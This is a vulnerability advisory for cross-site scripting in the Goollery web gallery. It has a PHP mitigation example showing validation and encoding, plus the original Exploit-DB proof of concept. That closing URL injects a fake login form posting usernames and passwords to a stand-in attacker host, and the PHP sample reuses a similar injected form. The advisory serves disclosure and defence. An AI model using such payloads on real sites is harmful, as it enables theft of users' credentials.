vendor: Goollery
by: Unknown
CVSS: 5.5 (MEDIUM)
CWE: 79 (Cross-site Scripting)
Product Name: Goollery
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Unknown

Cross-site Scripting Vulnerabilities in Goollery

The application Goollery is affected by various cross-site scripting vulnerabilities. These vulnerabilities occur when user-supplied URI input is not properly sanitized. Attackers can exploit these vulnerabilities by sending malicious HTML and script code through the 'page' parameter of certain scripts. If a victim user follows a malicious URI link, the hostile code may be rendered in their web browser.

Mitigation:

To mitigate these vulnerabilities, it is recommended to properly sanitize user-supplied input before using it in the application. This can be done by implementing input validation and output encoding techniques.
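
The two techniques named above, input validation and output encoding, shown next to the vulnerable pattern. This is an added example, not Goollery's own code: the function names, the assumption that 'page' is a page number, and the sample input are all constructed for illustration.

```php
<?php
declare(strict_types=1);

// Added example: hypothetical handlers, not Goollery's own code.

// Input validation: allow-list the parameter as a bounded positive integer.
// Assumption: 'page' is a page number; anything else is rejected, not "cleaned".
function validate_page($raw): ?int
{
    if (!is_string($raw)) {
        return null;               // arrays (page[]=x) and missing values
    }
    $n = filter_var($raw, FILTER_VALIDATE_INT,
        ['options' => ['min_range' => 1, 'max_range' => 100000]]);
    return $n === false ? null : $n;
}

// Output encoding: encode for the HTML context at the point of output.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Vulnerable pattern the advisory describes: request data echoed verbatim.
function render_link_unsafe(string $page): string
{
    return '<a href="viewpic.php?page=' . $page . '">back</a>';
}

// Hardened: validated value in the URL; free text is always encoded.
function render_link_safe($rawPage, string $label): string
{
    $page = validate_page($rawPage) ?? 1;   // fall back to the first page
    return '<a href="viewpic.php?page=' . $page . '">' . h($label) . '</a>';
}

// Constructed sample input modelled on the injected <form> in the report.
$injected = '"><form action="http://attacker.example/" method="post">';

echo render_link_unsafe($injected), "\n";          // markup reaches the page intact
echo render_link_safe($injected, $injected), "\n"; // page=1, label rendered as text
echo render_link_safe('3', 'Back to page 3'), "\n";
```

Validation alone is not enough for parameters that must carry free text; those still need encoding for the specific context (HTML body, attribute, URL, JavaScript) they are written into.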
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11587/info

It is reported that Goollery is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. 

These problems present themselves when malicious HTML and script code is sent to the application through the 'page' parameter of several scripts. 

These issues could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user.

http://www.example.com/goollery/viewpic.php?id=2&conversation_id=ffee00b71f3931a&btopage=<form%20action="http://www.atacker.com/save2db.asp"%20method="post">Username:<input%20name="username"%20type="text"%20maxlength="30"><br>Password:<input%20name="password"%20type="text"%20maxlength="30"><br><input%20name="login"%20type="submit"%20value="Login"></form>